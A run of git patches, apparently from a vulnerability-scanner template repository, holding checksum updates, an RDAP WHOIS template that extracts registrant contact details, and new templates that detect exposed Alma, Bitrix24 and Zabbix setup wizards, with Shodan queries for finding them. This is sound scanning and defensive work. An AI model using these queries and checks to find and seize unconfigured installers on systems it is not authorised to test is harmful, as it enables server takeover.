-http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:f8a89bab5553200004cd4ed2ff74f2f0ed6d3839
-http/technologies/wordpress/plugins/woo-variation-swatches.yaml:15b3a184c874db99255ba2551d4d925b71fba265
-http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:8e91bc3725d0de356884685dddd7736c9a637e67
-http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:d3230d977d47969a5dabaa59f5207bd47a4eba82
-http/technologies/wordpress/plugins/woocommerce-payments.yaml:3c8f70f3717ebb144aeecc4cf78351928e724ee4
-http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:e8e143f83f92d8128f4dcc8cfae0d24e744ff11b
-http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:8f2e7130b683e6c7db2d572d169d8b0d2959b8ee
-http/technologies/wordpress/plugins/woocommerce-services.yaml:9f4168ea86b7c265e840ecc39c5cd91457b69bba
-http/technologies/wordpress/plugins/woocommerce.yaml:ab02a75370fec98f312be65543b5571bb0495e40
+http/technologies/wordpress/plugins/updraftplus.yaml:0076f3c9a5ed4f2e2d2749c1b65eb23140214d7a
+http/technologies/wordpress/plugins/use-any-font.yaml:382b7daeb7b74956c8e3ee5f4c65254c65c4e487
+http/technologies/wordpress/plugins/user-role-editor.yaml:7c91ccbbd4225e3f1ad358f2a6feeb311b3f81fb
+http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:d3a9e8b173ba11ca7733ed58895d793b2824ba5e
+http/technologies/wordpress/plugins/w3-total-cache.yaml:d19a3d9cd406a2763a5d1e15391d260258f10d97
+http/technologies/wordpress/plugins/webp-converter-for-media.yaml:d438f3628f635772866af020c74bad5dfe1d0404
+http/technologies/wordpress/plugins/webp-express.yaml:28c13e642196daae49de19d38ef3e5890e9cccf8
+http/technologies/wordpress/plugins/widget-importer-exporter.yaml:a698c5c96df88e883aab70f73fe5b489a8470adc
+http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6ce9a25f844c90dc4a8a0ed085692d03e0e643ae
+http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:0c20bcedf17334904bd329de1f9596cfecca9ae6
+http/technologies/wordpress/plugins/woo-variation-swatches.yaml:f4bbcbe628b62a5853af61a175bec617bb48fbe4
+http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:94e0db445fc82d755e55292d448d99a450ae723c
+http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:a0bd411538fbdd622c592fbf6c705753f3b1ca18
+http/technologies/wordpress/plugins/woocommerce-payments.yaml:9ed780c632c83cd2d948af2a01eee2ea9cdd87a5
+http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:fc7c14abefdde2e6a9b280a04e504c623f2168bf
+http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d498033186c927e965619ba1736f8dc88c2c88b1
+http/technologies/wordpress/plugins/woocommerce-services.yaml:053a38cfa9a063b0475a7ec28d1f00c85589ffb6
+http/technologies/wordpress/plugins/woocommerce.yaml:21e14ecdd9795d0b3377c8cdb370ef2408a902c4
 http/technologies/wordpress/plugins/woosidebars.yaml:49e90e83fc3185fed5f2c0392a13a991ab64601d
-http/technologies/wordpress/plugins/wordfence.yaml:0462473344c345d9c4eb312705ebfcc5505cdcf5
-http/technologies/wordpress/plugins/wordpress-importer.yaml:205349dfc8dd684e8ab78d952a214f75af080074
-http/technologies/wordpress/plugins/wordpress-seo.yaml:0a74d6507bf2d8dbb696036a525130a48bdb1a68
-http/technologies/wordpress/plugins/worker.yaml:8e8fc14abfc1380551a94ee7f122b912bcacb4bd
-http/technologies/wordpress/plugins/wp-fastest-cache.yaml:ad1d73e97bbcc497867ff8d72002f8aebcf52ae2
-http/technologies/wordpress/plugins/wp-file-manager.yaml:ca4c546d57e540d639a66acd375eeb7d0b90fe5a
-http/technologies/wordpress/plugins/wp-google-maps.yaml:c2c7c8477a9742575d40bdc508937798d5c9f6a3
-http/technologies/wordpress/plugins/wp-mail-smtp.yaml:6091e5b4597b0556c2705a55b964b1b0f8c1f369
-http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:15d672886d871a30b62b87539ab11136bba70bb0
-http/technologies/wordpress/plugins/wp-migrate-db.yaml:44a5b5c4175d7c71e76216915ef4d2b1275881b1
-http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:65e0cf9f44588209a789e704fd5d4070f6482962
-http/technologies/wordpress/plugins/wp-optimize.yaml:31c2935841bd67eeeb87524152bb389c823d9ded
-http/technologies/wordpress/plugins/wp-pagenavi.yaml:96b012cb4c09e81ee2bf7e679cf96b2dbb1066f8
-http/technologies/wordpress/plugins/wp-reset.yaml:412514499164783863b8b68430c7f197f8b6ae54
-http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:ba98eba18acb3e8959037689a48560a9ce31a9f1
-http/technologies/wordpress/plugins/wp-rollback.yaml:4e307fe6f0d30b930431b040e0f478add975ad92
+http/technologies/wordpress/plugins/wordfence.yaml:59cf258e463fa7f76b21f3b3088b1d91a8ac44ee
+http/technologies/wordpress/plugins/wordpress-importer.yaml:3a47895288fe9d8d9ada42228022e25510544e8c
+http/technologies/wordpress/plugins/wordpress-seo.yaml:86e00ac8b21548056c7a9efbba9b66c675928457
+http/technologies/wordpress/plugins/worker.yaml:909166af340135b049385064e0cac70e3168c34f
+http/technologies/wordpress/plugins/wp-fastest-cache.yaml:8bcbdb8253bd78b63c34db17f1c754c5ebd2bd9f
+http/technologies/wordpress/plugins/wp-file-manager.yaml:cb51b1eaed5e009fa74ccad652e4590ff3613fd0
+http/technologies/wordpress/plugins/wp-google-maps.yaml:fa3a0d2461909eb76f9f4176a82719abe2a8baee
+http/technologies/wordpress/plugins/wp-mail-smtp.yaml:65d7a5942c9f22136fdf1568a47532465a0fd8e8
+http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:ba76df7ace8e17dbd081adb0beafa3d2e9a2751c
+http/technologies/wordpress/plugins/wp-migrate-db.yaml:eb5434734e59d7dac0579b08905ee11bc5ad623e
+http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:0b8258608436387a5af44bb17dc664261d84dc20
+http/technologies/wordpress/plugins/wp-optimize.yaml:b4c12386fa882d15ce98bc19736fe42f397ff7ce
+http/technologies/wordpress/plugins/wp-pagenavi.yaml:1ee64be881e3ce5eff6e61a1bf7b3878a4aa80c3
+http/technologies/wordpress/plugins/wp-reset.yaml:4aeb62db4c520ed2a1128a3931f1da1627d5504b
+http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:69b5e88af7e6e7b825f22b6f6eb34dea213dab95
+http/technologies/wordpress/plugins/wp-rollback.yaml:7a2b71c8a6a0c35005dad0fd021f4daa29209549
 http/technologies/wordpress/plugins/wp-seopress.yaml:93a821f479301582f2209a9f463b408118cfbec9
-http/technologies/wordpress/plugins/wp-sitemap-page.yaml:44243c1cc0d8c94a0ca19b5baf1f6f6fb70900a5
-http/technologies/wordpress/plugins/wp-smushit.yaml:d67ff121c4ac38fa566628f9966cf334348e1245
-http/technologies/wordpress/plugins/wp-statistics.yaml:3c959f67560b1721401a000bded1bc2959c303d1
-http/technologies/wordpress/plugins/wp-super-cache.yaml:0b19548fad990c640012c855076270e0491c2a6f
-http/technologies/wordpress/plugins/wp-user-avatar.yaml:1086201347cbaa54c492a64cfda00759e950437b
-http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:9f2183e36b5e1b85cd6849073307e5cad8d5b52d
-http/technologies/wordpress/plugins/wpcf7-redirect.yaml:ba93d4ef4608a790cd9d3d847b68bf9b1e1dea50
-http/technologies/wordpress/plugins/wpforms-lite.yaml:936181dc67fd85927eb912b1022a8a7c24b4a848
-http/technologies/wordpress/plugins/wps-hide-login.yaml:54566fd541d82b11fb105253384e00a14bc1cc75
-http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:c89d7b1d8eff0f72ba3d4ad3b54683d9b08a81bb
+http/technologies/wordpress/plugins/wp-sitemap-page.yaml:583c9968cc733e34f6b8b5b61a953c2d4b95e27b
+http/technologies/wordpress/plugins/wp-smushit.yaml:cd360eb2304096cd0f7ec6a67f1f6ed239320676
+http/technologies/wordpress/plugins/wp-statistics.yaml:3a7c780acc3cd312da690aa73dae8ccd151a9a90
+http/technologies/wordpress/plugins/wp-super-cache.yaml:cdb330ec2ee847335d17369905afe5b1ebb9b624
+http/technologies/wordpress/plugins/wp-user-avatar.yaml:401a4a8d3ad83bd1c23fd1be67314742cbf72468
+http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:5194cfad7904c267af9451baf7460c96d5310e02
+http/technologies/wordpress/plugins/wpcf7-redirect.yaml:66ae3a35ed37853fe298506a45469b3300e9f671
+http/technologies/wordpress/plugins/wpforms-lite.yaml:cb9b2f5385e57ef8acd020fc2acb090d2a5d7d40
+http/technologies/wordpress/plugins/wps-hide-login.yaml:791f9ccdb7e2de037094e6c41cebf6d93f50cf90
+http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:1760dbfa341c1f3dc21ad5d33393b55216735c39
 http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:061c0ff47f223158098b68a346e0c536112e8259
-http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:e3e323f44082c7c6610d1016c0062d40a6f6d788
+http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:83ae1cae0ae4886afdebf8213bfea549ca025f8a
 http/technologies/wordpress-detect.yaml:764a9e3823e31a5c778e6abb4d6065347a2005e9
 http/technologies/workerman-websocket-detect.yaml:fca8ff5fffe7de46782ab042287eddee06e883ed
 http/technologies/wso2-products-detect.yaml:9156bb5d6fccb55637e4fd2e59f0decc99c3fa69
@@ -7182,7 +7183,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed
 ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750
 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0
 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e
-templates-checksum.txt:3b6369678164dfa6f797db3b57b32773c5c20c56
+templates-checksum.txt:98b2fec4af2571744d92580d5b9b4d63b5e12638
 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c
 workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f

From c02832ffa528c8b5870e8f83abee9f6a9f00fbe3 Mon Sep 17 00:00:00 2001
From: Max K <40246850+sttlr@users.noreply.github.com>
Date: Tue, 19 Sep 2023 16:46:02 +0300
Subject: [PATCH 0453/1090] Update rdap-whois.yaml

Do not print anything upon error (when there is no information about a domain).
Use json extractor instead of regex - more reliable, fixes problems when RDAP Response isn't on one line.
Extract more fields from RDAP Response.
---
 http/miscellaneous/rdap-whois.yaml | 111 ++++++++++++++++-------------
 1 file changed, 60 insertions(+), 51 deletions(-)

diff --git a/http/miscellaneous/rdap-whois.yaml b/http/miscellaneous/rdap-whois.yaml
index f6dc62879a..c54bc51f8c 100644
--- a/http/miscellaneous/rdap-whois.yaml
+++ b/http/miscellaneous/rdap-whois.yaml
@@ -2,7 +2,7 @@ id: rdap-whois
 
 info:
   name: RDAP WHOIS
-  author: ricardomaia
+  author: ricardomaia,sttlr
   severity: info
   description: |
     RDAP (Registration Data Access Protocol) is a standard defined by the IETF to replace the whois protocol
@@ -25,72 +25,81 @@ http:
 
     redirects: true
     max-redirects: 3
+
+    matchers:
+      - type: status
+        status:
+          - 200
+
     extractors:
       - type: json
         part: body
-        name: raw
+        name: status
         json:
-          - "."
+          - '.status[]'
 
-      - type: regex
-        part: body
-        name: domain
-        group: 1
-        regex:
-          - '^{"objectClassName":"domain","handle":".*?","ldhName":"(.*?)"'
-
-      - type: regex
-        part: body
-        name: legalRepresentative
-        group: 1
-        regex:
-          - 'legalRepresentative":"(.*?)"'
-
-      - type: regex
-        part: body
-        name: identifier
-        group: 1
-        regex:
-          - 'identifier":"(.*?)"'
-
-      - type: regex
-        part: body
-        name: email
-        group: 1
-        regex:
-          - 'email",{},"text","(.*?)"'
-
-      - type: regex
+      - type: json
         part: body
         name: registrationDate
-        group: 1
-        regex:
-          - '"eventAction":"registration","eventDate":"(.*?)"'
+        json:
+          - '.events[] | select(.eventAction == "registration").eventDate'
 
-      - type: regex
+      - type: json
         part: body
         name: lastChangeDate
-        group: 1
-        regex:
-          - '"eventAction":"last changed","eventDate":"(.*?)"'
+        json:
+          - '.events[] | select(.eventAction == "last changed").eventDate'
 
-      - type: regex
+      - type: json
         part: body
         name: expirationDate
-        group: 1
-        regex:
-          - '"eventAction":"expiration","eventDate":"(.*?)"'
+        json:
+          - '.events[] | select(.eventAction == "expiration").eventDate'
 
-      - type: regex
+      - type: json
+        part: body
+        name: registrantName
+        json:
+          - '.entities[] | select(.roles[] | contains("registrant")) | .vcardArray[1].[] | select(.[0] == "fn") | .[-1]'
+
+      - type: json
+        part: body
+        name: registrantOrg
+        json:
+          - '.entities[] | select(.roles[] | contains("registrant")) | .vcardArray[1].[] | select(.[0] == "org") | .[-1]'
+
+      - type: json
+        part: body
+        name: registrantEmail
+        json:
+          - '.entities[] | select(.roles[] | contains("registrant")) | .vcardArray[1].[] | select(.[0] == "email") | .[-1]'
+
+      - type: json
+        part: body
+        name: registrantPhone
+        json:
+          - '.entities[] | select(.roles[] | contains("registrant")) | .vcardArray[1].[] | select(.[0] == "tel") | .[-1]'
+
+      - type: json
+        part: body
+        name: registrantAddress
+        json:
+          - '.entities[] | select(.roles[] | contains("registrant")) | .vcardArray[1].[] | select(.[0] == "adr") | .[-1][] | select(. != "")'
+
+      - type: json
+        part: body
+        name: registrantCountry
+        json:
+          - '.entities[] | select(.roles[] | contains("registrant")) | .vcardArray[1].[] | select(.[0] == "adr") | .[-1][-1]'
+
+      - type: json
         part: body
         name: nameServers
-        group: 1
-        regex:
-          - 'nameserver","ldhName":"(.*?)"'
+        json:
+          - '.nameservers[] | .ldhName'
 
-      - type: regex
+      - type: json
         part: body
         name: secureDNS
-        group: 1
-        regex:
-          - '"secureDNS":{"delegationSigned":(.*?)}'
+        json:
+          - '.secureDNS.delegationSigned // false'

From b7eb520be8d24f947f6590b41341cce0b649c225 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran 
Date: Tue, 19 Sep 2023 22:48:16 +0530
Subject: [PATCH 0454/1090] Create alma-installer.yaml

---
 .../installer/alma-installer.yaml             | 32 +++++++++++++++++++
 1 file changed, 32 insertions(+)
 create mode 100644 http/misconfiguration/installer/alma-installer.yaml

diff --git a/http/misconfiguration/installer/alma-installer.yaml b/http/misconfiguration/installer/alma-installer.yaml
new file mode 100644
index 0000000000..179229bea6
--- /dev/null
+++ b/http/misconfiguration/installer/alma-installer.yaml
@@ -0,0 +1,32 @@
+id: alma-installer
+
+info:
+  name: Alma Installation Exposure
+  author: DhiyaneshDK
+  severity: high
+  metadata:
+    max-request: 1
+    verified: true
+    shodan-query: title:"Alma Installation"
+  tags: misconfig,alma,install,exposure
+
+http:
+  - method: GET
+    path:
+      - '{{BaseURL}}/setup/start'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'Setup wizard | Alma Installation'
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
+
+      - type: status
+        status:
+          - 200

From 18ee52043133cb6002c8c3de2ebe3c0a81d60d02 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran 
Date: Tue, 19 Sep 2023 22:59:32 +0530
Subject: [PATCH 0455/1090] Create bitrix24-installer.yaml

---
 .../installer/bitrix24-installer.yaml         | 34 +++++++++++++++++++
 1 file changed, 34 insertions(+)
 create mode 100644 http/misconfiguration/installer/bitrix24-installer.yaml

diff --git a/http/misconfiguration/installer/bitrix24-installer.yaml b/http/misconfiguration/installer/bitrix24-installer.yaml
new file mode 100644
index 0000000000..6daf8b0d2d
--- /dev/null
+++ b/http/misconfiguration/installer/bitrix24-installer.yaml
@@ -0,0 +1,34 @@
+id: bitrix24-installer
+
+info:
+  name: Bitrix24 Installation Exposure
+  author: DhiyaneshDK
+  severity: high
+  metadata:
+    max-request: 1
+    verified: true
+    shodan-query: http.favicon.hash:-2115208104
+  tags: misconfig,bitrix24,install,exposure
+
+http:
+  - method: GET
+    path:
+      - '{{BaseURL}}'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'Start installation'
+          - 'Bitrix24'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
+
+      - type: status
+        status:
+          - 200

From b2d8375988d4562a19e6fd6888f5076d932050b1 Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Tue, 19 Sep 2023 17:37:29 +0000
Subject: [PATCH 0456/1090] Auto Generated New Template Addition List [Tue Sep
 19 17:37:28 UTC 2023] :robot:

---
 .new-additions | 1 +
 1 file changed, 1 insertion(+)

diff --git a/.new-additions b/.new-additions
index 007c3a3e50..2e9df042e9 100644
--- a/.new-additions
+++ b/.new-additions
@@ -1,4 +1,5 @@
 http/cves/2023/CVE-2023-2766.yaml
 http/cves/2023/CVE-2023-4568.yaml
 http/exposures/tokens/jotform/jotform-api-key.yaml
+http/misconfiguration/installer/alma-installer.yaml
 http/misconfiguration/installer/mantisbt-installer.yaml

From 326c6fb4aa6ba41a2e70e5f63f6e90f0ecbc43b6 Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Tue, 19 Sep 2023 17:37:42 +0000
Subject: [PATCH 0457/1090] Auto Generated Templates Checksum [Tue Sep 19
 17:37:42 UTC 2023] :robot:

---
 templates-checksum.txt | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/templates-checksum.txt b/templates-checksum.txt
index 7b31af2c70..e402ecca5d 100644
--- a/templates-checksum.txt
+++ b/templates-checksum.txt
@@ -4472,6 +4472,7 @@ http/misconfiguration/httponly-cookie-detect.yaml:c64d772ea2b1baebf90eb45d17b948
 http/misconfiguration/ibm-friendly-path-exposure.yaml:02e17960b936d9497f8673629bf5c75000e1f633
 http/misconfiguration/ibm-websphere-xml.yaml:8b457d337cb671b938b8dee1743b2ba009689b7b
 http/misconfiguration/installer/acunetix-360-installer.yaml:08978fd91dcf0249d0d50ec692ea165e73a1342d
+http/misconfiguration/installer/alma-installer.yaml:1e6a778af0f1a917e09803fd3e523efdbd8d2258
 http/misconfiguration/installer/ampache-music-installer.yaml:28e4b0bedc08cbf5210559e43f440e444ad35820
 http/misconfiguration/installer/atlassian-bamboo-setup-wizard.yaml:46a5c397b2f9d57c2d7a7b8f2e3423835cc75d80
 http/misconfiguration/installer/avideo-install.yaml:98964c7f04afc20db0e4b56e508439b7b596cd26
@@ -7183,7 +7184,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed
 ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750
 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0
 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e
-templates-checksum.txt:98b2fec4af2571744d92580d5b9b4d63b5e12638
+templates-checksum.txt:28ebca963ae717c156d0adbbcac57a2c0266b9c4
 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c
 workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f

From 68677f484518e18030c4f9db2647d864bfe46f9c Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran 
Date: Tue, 19 Sep 2023 23:11:14 +0530
Subject: [PATCH 0458/1090] Create zabbix-installer.yaml

---
 .../installer/zabbix-installer.yaml           | 34 +++++++++++++++++++
 1 file changed, 34 insertions(+)
 create mode 100644 http/misconfiguration/installer/zabbix-installer.yaml

diff --git a/http/misconfiguration/installer/zabbix-installer.yaml b/http/misconfiguration/installer/zabbix-installer.yaml
new file mode 100644
index 0000000000..bcab879333
--- /dev/null
+++ b/http/misconfiguration/installer/zabbix-installer.yaml
@@ -0,0 +1,34 @@
+id: zabbix-installer
+
+info:
+  name: Zabbix Installation Exposure
+  author: DhiyaneshDK
+  severity: high
+  metadata:
+    max-request: 1
+    verified: true
+    shodan-query: http.favicon.hash:892542951
+  tags: misconfig,zabbix,install,exposure
+
+http:
+  - method: GET
+    path:
+      - '{{BaseURL}}/setup.php'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'Installation'
+          - 'zabbix'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
+
+      - type: status
+        status:
+          - 200

From bd15d8e7f95b01664b0829237b860c205b7ea990 Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Wed, 20 Sep 2023 04:02:23 +0000
Subject: [PATCH 0459/1090] Auto WordPress Plugins Update [Wed Sep 20 04:02:23
 UTC 2023] :robot:

---
 helpers/wordpress/plugins/duplicator.txt                        | 2 +-
 helpers/wordpress/plugins/imagify.txt                           | 2 +-
 helpers/wordpress/plugins/insert-headers-and-footers.txt        | 2 +-
 helpers/wordpress/plugins/kadence-blocks.txt                    | 2 +-
 helpers/wordpress/plugins/mailpoet.txt                          | 2 +-
 helpers/wordpress/plugins/ninja-forms.txt                       | 2 +-
 helpers/wordpress/plugins/translatepress-multilingual.txt       | 2 +-
 helpers/wordpress/plugins/wordpress-seo.txt                     | 2 +-
 helpers/wordpress/plugins/wp-seopress.txt                       | 2 +-
 helpers/wordpress/plugins/wp-user-avatar.txt                    | 2 +-
 http/technologies/wordpress/plugins/ad-inserter.yaml            | 1 -
 http/technologies/wordpress/plugins/add-to-any.yaml             | 1 -
 http/technologies/wordpress/plugins/admin-menu-editor.yaml      | 1 -
 http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 -
 http/technologies/wordpress/plugins/akismet.yaml                | 1 -
 .../wordpress/plugins/all-404-redirect-to-homepage.yaml         | 1 -
 http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml    | 1 -
 .../technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 -
 .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml  | 1 -
 http/technologies/wordpress/plugins/amp.yaml                    | 1 -
 http/technologies/wordpress/plugins/antispam-bee.yaml           | 1 -
 http/technologies/wordpress/plugins/astra-sites.yaml            | 1 -
 http/technologies/wordpress/plugins/astra-widgets.yaml          | 1 -
 http/technologies/wordpress/plugins/autoptimize.yaml            | 1 -
 http/technologies/wordpress/plugins/backwpup.yaml               | 1 -
 http/technologies/wordpress/plugins/better-search-replace.yaml  | 1 -
 http/technologies/wordpress/plugins/better-wp-security.yaml     | 1 -
 .../wordpress/plugins/black-studio-tinymce-widget.yaml          | 1 -
 http/technologies/wordpress/plugins/breadcrumb-navxt.yaml       | 1 -
 http/technologies/wordpress/plugins/breeze.yaml                 | 1 -
 http/technologies/wordpress/plugins/broken-link-checker.yaml    | 1 -
 .../wordpress/plugins/child-theme-configurator.yaml             | 1 -
 http/technologies/wordpress/plugins/classic-editor.yaml         | 1 -
 http/technologies/wordpress/plugins/classic-widgets.yaml        | 1 -
 .../wordpress/plugins/click-to-chat-for-whatsapp.yaml           | 1 -
 http/technologies/wordpress/plugins/cmb2.yaml                   | 1 -
 http/technologies/wordpress/plugins/coblocks.yaml               | 1 -
 http/technologies/wordpress/plugins/code-snippets.yaml          | 1 -
 http/technologies/wordpress/plugins/coming-soon.yaml            | 1 -
 http/technologies/wordpress/plugins/complianz-gdpr.yaml         | 1 -
 .../technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 -
 http/technologies/wordpress/plugins/contact-form-7.yaml         | 1 -
 http/technologies/wordpress/plugins/contact-form-cfdb7.yaml     | 1 -
 http/technologies/wordpress/plugins/cookie-law-info.yaml        | 1 -
 http/technologies/wordpress/plugins/cookie-notice.yaml          | 1 -
 http/technologies/wordpress/plugins/creame-whatsapp-me.yaml     | 1 -
 .../wordpress/plugins/creative-mail-by-constant-contact.yaml    | 1 -
 http/technologies/wordpress/plugins/custom-css-js.yaml          | 1 -
 http/technologies/wordpress/plugins/custom-fonts.yaml           | 1 -
 http/technologies/wordpress/plugins/custom-post-type-ui.yaml    | 1 -
 http/technologies/wordpress/plugins/disable-comments.yaml       | 1 -
 http/technologies/wordpress/plugins/disable-gutenberg.yaml      | 1 -
 http/technologies/wordpress/plugins/duplicate-page.yaml         | 1 -
 http/technologies/wordpress/plugins/duplicate-post.yaml         | 1 -
 http/technologies/wordpress/plugins/duplicator.yaml             | 1 -
 .../wordpress/plugins/duracelltomi-google-tag-manager.yaml      | 1 -
 http/technologies/wordpress/plugins/easy-fancybox.yaml          | 1 -
 http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 -
 http/technologies/wordpress/plugins/easy-wp-smtp.yaml           | 1 -
 http/technologies/wordpress/plugins/elementor.yaml              | 1 -
 http/technologies/wordpress/plugins/elementskit-lite.yaml       | 1 -
 http/technologies/wordpress/plugins/enable-media-replace.yaml   | 1 -
 http/technologies/wordpress/plugins/envato-elements.yaml        | 1 -
 .../wordpress/plugins/essential-addons-for-elementor-lite.yaml  | 1 -
 http/technologies/wordpress/plugins/ewww-image-optimizer.yaml   | 1 -
 .../wordpress/plugins/facebook-for-woocommerce.yaml             | 1 -
 http/technologies/wordpress/plugins/fast-indexing-api.yaml      | 1 -
 .../wordpress/plugins/favicon-by-realfavicongenerator.yaml      | 1 -
 http/technologies/wordpress/plugins/flamingo.yaml               | 1 -
 http/technologies/wordpress/plugins/fluentform.yaml             | 1 -
 http/technologies/wordpress/plugins/font-awesome.yaml           | 1 -
 .../wordpress/plugins/force-regenerate-thumbnails.yaml          | 1 -
 http/technologies/wordpress/plugins/formidable.yaml             | 1 -
 http/technologies/wordpress/plugins/forminator.yaml             | 1 -
 http/technologies/wordpress/plugins/ga-google-analytics.yaml    | 1 -
 http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 -
 .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml    | 1 -
 .../wordpress/plugins/google-analytics-for-wordpress.yaml       | 1 -
 .../technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 -
 http/technologies/wordpress/plugins/google-site-kit.yaml        | 1 -
 .../wordpress/plugins/google-sitemap-generator.yaml             | 1 -
 http/technologies/wordpress/plugins/gtranslate.yaml             | 1 -
 http/technologies/wordpress/plugins/gutenberg.yaml              | 1 -
 http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 -
 .../wordpress/plugins/header-footer-code-manager.yaml           | 1 -
 .../technologies/wordpress/plugins/header-footer-elementor.yaml | 1 -
 http/technologies/wordpress/plugins/header-footer.yaml          | 1 -
 http/technologies/wordpress/plugins/health-check.yaml           | 1 -
 http/technologies/wordpress/plugins/hello-dolly.yaml            | 1 -
 http/technologies/wordpress/plugins/host-webfonts-local.yaml    | 1 -
 http/technologies/wordpress/plugins/imagify.yaml                | 1 -
 http/technologies/wordpress/plugins/imsanity.yaml               | 1 -
 .../wordpress/plugins/insert-headers-and-footers.yaml           | 1 -
 http/technologies/wordpress/plugins/instagram-feed.yaml         | 1 -
 .../wordpress/plugins/intuitive-custom-post-order.yaml          | 1 -
 http/technologies/wordpress/plugins/iwp-client.yaml             | 1 -
 http/technologies/wordpress/plugins/jetpack-boost.yaml          | 1 -
 http/technologies/wordpress/plugins/jetpack.yaml                | 1 -
 http/technologies/wordpress/plugins/kadence-blocks.yaml         | 1 -
 http/technologies/wordpress/plugins/kirki.yaml                  | 1 -
 http/technologies/wordpress/plugins/leadin.yaml                 | 1 -
 .../wordpress/plugins/limit-login-attempts-reloaded.yaml        | 1 -
 http/technologies/wordpress/plugins/limit-login-attempts.yaml   | 1 -
 http/technologies/wordpress/plugins/litespeed-cache.yaml        | 1 -
 http/technologies/wordpress/plugins/loco-translate.yaml         | 1 -
 http/technologies/wordpress/plugins/loginizer.yaml              | 1 -
 .../wordpress/plugins/mailchimp-for-woocommerce.yaml            | 1 -
 http/technologies/wordpress/plugins/mailchimp-for-wp.yaml       | 1 -
 http/technologies/wordpress/plugins/mailpoet.yaml               | 1 -
 http/technologies/wordpress/plugins/maintenance.yaml            | 1 -
 http/technologies/wordpress/plugins/mainwp-child.yaml           | 1 -
 http/technologies/wordpress/plugins/malcare-security.yaml       | 1 -
 http/technologies/wordpress/plugins/megamenu.yaml               | 1 -
 http/technologies/wordpress/plugins/members.yaml                | 1 -
 http/technologies/wordpress/plugins/meta-box.yaml               | 1 -
 http/technologies/wordpress/plugins/ml-slider.yaml              | 1 -
 http/technologies/wordpress/plugins/newsletter.yaml             | 1 -
 .../wordpress/plugins/nextend-facebook-connect.yaml             | 1 -
 http/technologies/wordpress/plugins/nextgen-gallery.yaml        | 1 -
 http/technologies/wordpress/plugins/ninja-forms.yaml            | 1 -
 http/technologies/wordpress/plugins/ocean-extra.yaml            | 1 -
 .../technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 -
 http/technologies/wordpress/plugins/one-click-demo-import.yaml  | 1 -
 http/technologies/wordpress/plugins/optinmonster.yaml           | 1 -
 http/technologies/wordpress/plugins/otter-blocks.yaml           | 1 -
 http/technologies/wordpress/plugins/password-protected.yaml     | 1 -
 http/technologies/wordpress/plugins/pdf-embedder.yaml           | 1 -
 .../wordpress/plugins/pinterest-for-woocommerce.yaml            | 1 -
 http/technologies/wordpress/plugins/pixelyoursite.yaml          | 1 -
